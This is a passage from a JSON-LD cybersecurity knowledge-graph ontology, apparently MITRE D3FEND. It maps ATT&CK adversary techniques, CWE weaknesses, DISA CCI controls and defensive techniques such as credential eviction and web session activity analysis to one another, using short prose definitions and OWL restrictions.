          "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobilePersistenceTechnique"
        },
        {
          "@id": "d3f:ATTACKMobilePrivilegeEscalationTechnique"
        }
      ],
      "skos:prefLabel": "Code Injection"
    },
    {
      "@id": "d3f:CredentialEviction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:CredentialEviction"
      ],
      "d3f:d3fend-id": "D3-CE",
      "d3f:definition": "Credential Eviction techniques disable or remove compromised credentials from a computer network.",
      "d3f:enables": {
        "@id": "d3f:Evict"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-AccountMonitoring_ForescoutTechnologies"
      },
      "rdfs:label": "Credential Eviction",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:Na6b77463789a4fa8bb38dc62c76a92b0"
        }
      ]
    },
    {
      "@id": "_:Na6b77463789a4fa8bb38dc62c76a92b0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Evict"
      }
    },
    {
      "@id": "d3f:Processor",
      "@type": "owl:Class",
      "d3f:definition": "A processor is a hardware component or integrated circuit that performs computations, executes instructions, and processes data to carry out tasks within a computing system.",
      "d3f:synonym": "Computer Processor",
      "rdfs:label": "Processor",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:CWE-540",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-540",
      "d3f:definition": "Source code on a web server or repository often contains sensitive information and should generally not be accessible to users.",
      "rdfs:label": "Inclusion of Sensitive Information in Source Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-538"
      }
    },
    {
      "@id": "d3f:DS0033",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A storage resource (typically a folder or drive) made available from one host to others using network protocols, such as Server Message Block (SMB) or Network File System (NFS)",
      "rdfs:comment": "This data source captures events relating to shared network resources and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "Network Share (ATT&CK DS)"
    },
    {
      "@id": "d3f:T1059.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1059.006",
      "d3f:definition": "Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the <code>python.exe</code> interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.(Citation: Zscaler APT31 Covid-19 October 2020)",
      "rdfs:label": "Python",
      "rdfs:subClassOf": {
        "@id": "d3f:T1059"
      }
    },
    {
      "@id": "d3f:CWE-1245",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1245",
      "d3f:definition": "Faulty finite state machines (FSMs) in the hardware logic allow an attacker to put the system in an undefined state, to cause a denial of service (DoS) or gain privileges on the victim's system.",
      "rdfs:label": "Improper Finite State Machines (FSMs) in Hardware Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-684"
      }
    },
    {
      "@id": "d3f:CWE-650",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-650",
      "d3f:definition": "The server contains a protection mechanism that assumes that any URI that is accessed using HTTP GET will not cause a state change to the associated resource. This might allow attackers to bypass intended access restrictions and conduct resource modification and deletion attacks, since some applications allow GET to modify state.",
      "rdfs:label": "Trusting HTTP Permission Methods on the Server Side",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-436"
      }
    },
    {
      "@id": "d3f:DS0017",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A directive given to a computer program, acting as an interpreter of some kind, in order to perform a specific task",
      "rdfs:comment": "This data source captures events relating to commands and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "Command (ATT&CK DS)"
    },
    {
      "@id": "d3f:T1547.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1547.001",
      "d3f:definition": "Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.",
      "d3f:may-modify": [
        {
          "@id": "d3f:SystemConfigurationInitDatabaseRecord"
        },
        {
          "@id": "d3f:UserStartupScriptFile"
        }
      ],
      "rdfs:label": "Registry Run Keys / Startup Folder",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1547"
        },
        {
          "@id": "_:N51746958ff054351b85aee58da174b23"
        },
        {
          "@id": "_:Nf56e3222c1c646509caf71845aad8a4b"
        }
      ]
    },
    {
      "@id": "_:N51746958ff054351b85aee58da174b23",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationInitDatabaseRecord"
      }
    },
    {
      "@id": "_:Nf56e3222c1c646509caf71845aad8a4b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserStartupScriptFile"
      }
    },
    {
      "@id": "d3f:CCI-002716_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:FileHashing"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements cryptographic mechanisms to detect unauthorized changes to software.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002716"
    },
    {
      "@id": "d3f:ShellCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A shell command is a directive to some kind of command-line interface, such as a shell.",
      "d3f:may-create": {
        "@id": "d3f:Process"
      },
      "d3f:may-execute": {
        "@id": "d3f:ExecutableFile"
      },
      "d3f:recorded-in": {
        "@id": "d3f:CommandHistoryLog"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Command_(computing)"
      },
      "rdfs:label": "Shell Command",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Command"
        },
        {
          "@id": "_:Nf90ce0fd0b70437e933d7337269f222e"
        },
        {
          "@id": "_:N6431119e9fcc4e7fb77b0042937c8621"
        },
        {
          "@id": "_:N2f1b48b296484b55876260f84dda5afc"
        }
      ]
    },
    {
      "@id": "_:Nf90ce0fd0b70437e933d7337269f222e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "_:N6431119e9fcc4e7fb77b0042937c8621",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-execute"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "_:N2f1b48b296484b55876260f84dda5afc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:recorded-in"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CommandHistoryLog"
      }
    },
    {
      "@id": "d3f:WebSessionActivityAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:WebSessionActivityAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:WebResourceAccess"
      },
      "d3f:d3fend-id": "D3-WSAA",
      "d3f:definition": "Monitoring changes in user web session behavior by comparing current web session activity to a baseline behavior profile or a catalog of predetermined malicious behavior.",
      "d3f:kb-article": "## How it works\nUser web session data is collected over a period of time to create a user behavior profile. Data collected includes clicks made on a website, average time between clicks, filling out web forms, order in which pages are viewed, and downloading files. Current user web session behavior is then compared against the use behavior profile to identify anomalies and a likelihood that the current user web session is malicious. Current user web session behavior can also be compared to predetermined known malicious behavior profiles that are developed through analysis of malware in run time at a threat research facility.\n\n## Considerations\n* Potential for false positives from anomalies that are not associated with malicious activity.\n* Attackers may not differentiate their web session activity enough to trigger an alert.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-HostIntrusionPreventionSystemUsingSoftwareAndUserBehaviorAnalysis_SophosLtd"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodForDetectionOfAChangeInBehaviorInTheUseOfAWebsiteThroughVectorVelocityAnalysis_SilverTailSystems"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodForNetworkSecurityIncludingDetectionOfAttacksThroughPartnerWebsites_EMCIPHoldingCoLLC"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodThereofForIdentifyingAndRespondingToSecurityIncidentsBasedOnPreemptiveForensics_PaloAltoNetworksInc"
        }
      ],
      "rdfs:label": "Web Session Activity Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserBehaviorAnalysis"
        },
        {
          "@id": "_:N78ef85ee089641feb9d9008ba5317a0e"
        }
      ]
    },
    {
      "@id": "_:N78ef85ee089641feb9d9008ba5317a0e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WebResourceAccess"
      }
    },
    {
      "@id": "d3f:T1553.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1553.004",
      "d3f:definition": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.(Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.",
      "d3f:modifies": {
        "@id": "d3f:CertificateTrustStore"
      },
      "rdfs:label": "Install Root Certificate",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1553"
        },
        {
          "@id": "_:Nc1713b04fe794b08a82c97ff89f7ee2a"
        }
      ]
    },
    {
      "@id": "_:Nc1713b04fe794b08a82c97ff89f7ee2a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CertificateTrustStore"
      }
    },
    {
      "@id": "d3f:RD-0005.03",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0005.03",
      "d3f:definition": "Kinetic capabilities physically strike space or ground elements. In space, direct-ascent systems launch from Earth to intercept a satellite on orbit; co-orbital systems maneuver in space to approach and impact a target. On the ground, kinetic attacks can target stations or support infrastructure. These actions are generally easier to detect and attribute and often produce persistent, hazardous debris in orbit, especially at higher altitudes, making them strategically escalatory. Actors developing or accessing such capabilities gain credible coercive power but at significant political and operational cost.",
      "rdfs:label": "Kinetic Physical ASAT - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0005/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0005"
      },
      "skos:prefLabel": "Kinetic Physical ASAT"
    },
    {
      "@id": "d3f:T1053.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1053.003",
      "d3f:definition": "Adversaries may abuse the <code>cron</code> utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The <code>cron</code> utility is a time-based job scheduler for Unix-like operating systems.  The <code> crontab</code> file contains the schedule of cron entries to be run and the specified times for execution. Any <code>crontab</code> files are stored in operating system-specific file paths.",
      "rdfs:label": "Cron",
      "rdfs:subClassOf": {
        "@id": "d3f:T1053"
      }
    },
    {
      "@id": "d3f:LinuxKillArgumentSIGKILL",
      "@type": "owl:Class",
      "d3f:definition": "Send SIGKILL signal to a process.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/kill.2.html"
      },
      "rdfs:label": "Linux Kill Argument SIGKILL",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPITerminateProcess"
      }
    },
    {
      "@id": "d3f:T1204.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1204.002",
      "d3f:definition": "An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.",
      "d3f:executes": {
        "@id": "d3f:ExecutableFile"
      },
      "rdfs:label": "Malicious File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1204"
        },
        {
          "@id": "_:N0b90454106b34aa39aa02765e37f5677"
        }
      ]
    },
    {
      "@id": "_:N0b90454106b34aa39aa02765e37f5677",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "d3f:T1004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1004",
      "d3f:definition": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in <code>HKLM\\Software\\[Wow6432Node\\]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\</code> and <code>HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\</code> are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1547.004",
      "rdfs:label": "Winlogon Helper DLL",
      "rdfs:seeAlso": {
        "@id": "d3f:T1547.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:CWE-57",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-57",
      "d3f:definition": "The product contains protection mechanisms to restrict access to 'realdir/filename', but it constructs pathnames using external input in the form of 'fakedir/../realdir/filename' that are not handled by those mechanisms. This allows attackers to perform unauthorized actions against the targeted file.",
      "rdfs:label": "Path Equivalence: 'fakedir/../realdir/filename'",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-41"
      }
    },
    {
      "@id": "d3f:T1409",
      "@type": "owl:Class",
      "d3f:attack-id": "T1409",
      "d3f:definition": "Adversaries may try to access and collect application data resident on the device. Adversaries often target popular applications, such as Facebook, WeChat, and Gmail.(Citation: SWB Exodus March 2019)",
      "rdfs:label": "Stored Application Data - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCollectionTechnique"
      },
      "skos:prefLabel": "Stored Application Data"
    },
    {
      "@id": "d3f:Transformer-XL",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-TX",
      "d3f:definition": "Transformer-XL is a transformer architecture that introduces the notion of recurrence to the deep self-attention network. Instead of computing the hidden states from scratch for each new segment, Transformer-XL reuses the hidden states obtained in previous segments.",
      "d3f:kb-article": "## References\nTransformer-XL. (n.d.). Papers with Code. [Link](https://paperswithcode.com/method/transformer-xl)",
      "rdfs:label": "Transformer-XL",
      "rdfs:subClassOf": {
        "@id": "d3f:Transformer-basedLearning"
      }
    },
    {
      "@id": "d3f:GetOpenWindows",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Get Open Windows",
      "rdfs:subClassOf": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "d3f:UserAccountPasswordChangeEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a user account's password is modified, typically by the user or an administrator.",
      "rdfs:label": "User Account Password Change Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserAccountEvent"
        },
        {
          "@id": "_:N95362717c3d84242b8f651d51646e4ec"
        },
        {
          "@id": "_:N42949f80c2794440a3a7bf74b768cc7d"
        }
      ]
    },
    {
      "@id": "_:N95362717c3d84242b8f651d51646e4ec",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "_:N42949f80c2794440a3a7bf74b768cc7d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccountCreationEvent"
      }
    },
    {
      "@id": "d3f:T1114.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1114.001",
      "d3f:definition": "Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.",
      "d3f:reads": {
        "@id": "d3f:Email"
      },
      "rdfs:label": "Local Email Collection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1114"
        },
        {
          "@id": "_:N923feaa4197045bb9beb8e46fa5eb804"
        }
      ]
    },
    {
      "@id": "_:N923feaa4197045bb9beb8e46fa5eb804",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:reads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Email"
      }
    },
    {
      "@id": "d3f:T1663",
      "@type": "owl:Class",
      "d3f:attack-id": "T1663",
      "d3f:definition": "Adversaries may use legitimate remote access software, such as `VNC`, `TeamViewer`, `AirDroid`, `AirMirror`, etc., to establish an interactive command and control channel to target mobile devices.",
      "rdfs:label": "Remote Access Software - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCommandAndControlTechnique"
      },
      "skos:prefLabel": "Remote Access Software"
    },
    {
      "@id": "d3f:T1405",
      "@type": "owl:Class",
      "d3f:attack-id": "T1405",
      "d3f:definition": "A malicious app or other attack vector could be used to exploit vulnerabilities in code running within the Trusted Execution Environment (TEE) (Citation: Thomas-TrustZone). The adversary could then obtain privileges held by the TEE potentially including the ability to access cryptographic keys or other sensitive data (Citation: QualcommKeyMaster). Escalated operating system privileges may be first required in order to have the ability to attack the TEE (Citation: EkbergTEE). If not, privileges within the TEE can potentially be used to exploit the operating system (Citation: laginimaineb-TEE).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Exploit TEE Vulnerability - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileCredentialAccessTechnique"
        },
        {
          "@id": "d3f:ATTACKMobilePrivilegeEscalationTechnique"
        }
      ],
      "skos:prefLabel": "Exploit TEE Vulnerability"
    },
    {
      "@id": "d3f:ApplicationPerformanceMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ApplicationPerformanceMonitoring"
      ],
      "d3f:d3fend-id": "D3-APM",
      "d3f:definition": "Monitoring the count and duration of the application or program cycle.",
      "d3f:kb-article": "## How it works\nKeeping track of the controller cycle time by logging it, setting alarms, and correlating with other events. Changes to cycle time can be indicative of injecting new logic, deleting logic, or system failures.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SecurePLCCodingPracticesTop20List"
      },
      "d3f:monitors": [
        {
          "@id": "d3f:ApplicationScanTime"
        },
        {
          "@id": "d3f:SystemApplicationCycleCount"
        }
      ],
      "rdfs:label": "Application Performance Monitoring",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformMonitoring"
        },
        {
          "@id": "_:N0a85c4c5041542359f549620a91f1aa9"
        },
        {
          "@id": "_:Nf73102bfe59d40c98a131f0b6f56d190"
        }
      ]
    },
    {
      "@id": "_:N0a85c4c5041542359f549620a91f1aa9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationScanTime"
      }
    },
    {
      "@id": "_:Nf73102bfe59d40c98a131f0b6f56d190",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemApplicationCycleCount"
      }
    },
    {
      "@id": "d3f:CCI-001376_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system uniquely identifies source domains for information transfer.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001376"
    },
    {
      "@id": "d3f:T1176",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1176",
      "d3f:definition": "Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)",
      "d3f:modifies": {
        "@id": "d3f:BrowserExtension"
      },
      "rdfs:label": "Software Extensions",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "_:N6061ac69b9324e74a695bb8a2f4c334d"
        }
      ]
    },
    {
      "@id": "_:N6061ac69b9324e74a695bb8a2f4c334d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BrowserExtension"
      }
    },
    {
      "@id": "d3f:jams",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x jams y: The entity x deliberately introduces interfering energy that degrades, disrupts, blocks, or masks the information-bearing capability of the target y.",
      "rdfs:label": "jams",
      "rdfs:subPropertyOf": {
        "@id": "d3f:impairs"
      }
    },
    {
      "@id": "d3f:GuidelineReference",
      "@type": "owl:Class",
      "d3f:pref-label": "Guideline",
      "rdfs:label": "Guideline Reference",
      "rdfs:subClassOf": {
        "@id": "d3f:PolicyReference"
      }
    },
    {
      "@id": "d3f:T1584.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1584.006",
      "d3f:definition": "Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, SendGrid, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. Additionally, leveraging compromised web-based email services may allow adversaries to leverage the trust associated with legitimate domains.",
      "rdfs:label": "Web Services",
      "rdfs:subClassOf": {
        "@id": "d3f:T1584"
      }
    },
    {
      "@id": "d3f:CCI-002746_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides a manual override capability for input validation of organization-defined inputs.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DatabaseQueryStringAnalysis"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002746"
    },
    {
      "@id": "d3f:derived-from",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x derived-from y: The entity x is derived from or based on the value of y.",
      "rdfs:label": "derived-from",
      "rdfs:subPropertyOf": {
        "@id": "d3f:depends-on"
      }
    },
    {
      "@id": "d3f:LinuxCreat",
      "@type": "owl:Class",
      "d3f:definition": "Equivalent to calling Linux Open with flags equal to O_CREAT|O_WRONLY|O_TRUNC.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/creat.2.html"
      },
      "rdfs:label": "Linux Creat",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateFile"
      }
    },
    {
      "@id": "d3f:CCI-002394_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system protects the availability of resources by allocating organization-defined resources based on priority, quota, and/or organization-defined security safeguards.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemConfigurationPermissions"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002394"
    },
    {
      "@id": "d3f:T1640",
      "@type": "owl:Class",
      "d3f:attack-id": "T1640",
      "d3f:definition": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: credentials changed) to remove access to accounts.",
      "rdfs:label": "Account Access Removal - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileImpactTechnique"
      },
      "skos:prefLabel": "Account Access Removal"
    },
    {
      "@id": "d3f:Reference-CAR-2021-05-010%3ACreateLocalAdminAccountsUsingNetExe_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-05-010/"
      },
      "d3f:kb-abstract": "This search looks for the creation of local administrator accounts using net.exe.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-05-010: Create local admin accounts using net exe",
      "rdfs:label": "Reference - CAR-2021-05-010: Create local admin accounts using net exe - MITRE"
    },
    {
      "@id": "d3f:RealtimeClock",
      "@type": "owl:Class",
      "d3f:definition": "A real-time clock (RTC) is an electronic device (most often in the form of an integrated circuit) that measures the passage of time.",
      "d3f:synonym": "RTC",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/resource/Real-time_clock"
      },
      "rdfs:label": "Real-time Clock",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareClock"
      }
    },
    {
      "@id": "d3f:CWE-1278",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1278",
      "d3f:definition": "Information stored in hardware may be recovered by an attacker with the capability to capture and analyze images of the integrated circuit using techniques such as scanning electron microscopy.",
      "rdfs:label": "Missing Protection Against Hardware Reverse Engineering Using Integrated Circuit (IC) Imaging Techniques",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:MicrosoftWordDOCMFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:DocumentFile"
      ],
      "rdfs:label": "Microsoft Word DOCM File"
    },
    {
      "@id": "d3f:instructs",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x instructs y: A subject x delivers machine instructions to object y.",
      "rdfs:label": "instructs",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:InboundInternetWebTraffic",
      "@type": "owl:Class",
      "d3f:definition": "Inbound internet web traffic is network traffic that is: (a) on an incoming connection initiated from a host outside the network to a host within a network, and (b) using a standard web protocol.",
      "rdfs:label": "Inbound Internet Web Traffic",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Internetworking"
        },
        {
          "@id": "https://schema.ocsf.io/objects/http_response"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:InboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:ExternalThreatModelThing",
      "@type": "owl:Class",
      "rdfs:label": "External Threat Model Thing",
      "rdfs:subClassOf": {
        "@id": "d3f:ExternalThing"
      }
    },
    {
      "@id": "d3f:CWE-390",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-390",
      "d3f:definition": "The product detects a specific error, but takes no actions to handle the error.",
      "rdfs:label": "Detection of Error Condition Without Action",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-755"
      }
    },
    {
      "@id": "d3f:CCI-002631_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system issues a warning, audits the command execution, or prevents the execution of the command when organization-defined unauthorized operating system commands are detected.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:ScriptExecutionAnalysis"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002631"
    },
    {
      "@id": "d3f:FileRenamingEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the renaming of a file, modifying its identifier within the file system while retaining its content and metadata.",
      "rdfs:label": "File Renaming Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileEvent"
        },
        {
          "@id": "_:Nb045dc3df86c429cab715026b5a8adc9"
        },
        {
          "@id": "_:N42259e8bf50e423ab1f71f922bf09a41"
        }
      ]
    },
    {
      "@id": "_:Nb045dc3df86c429cab715026b5a8adc9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
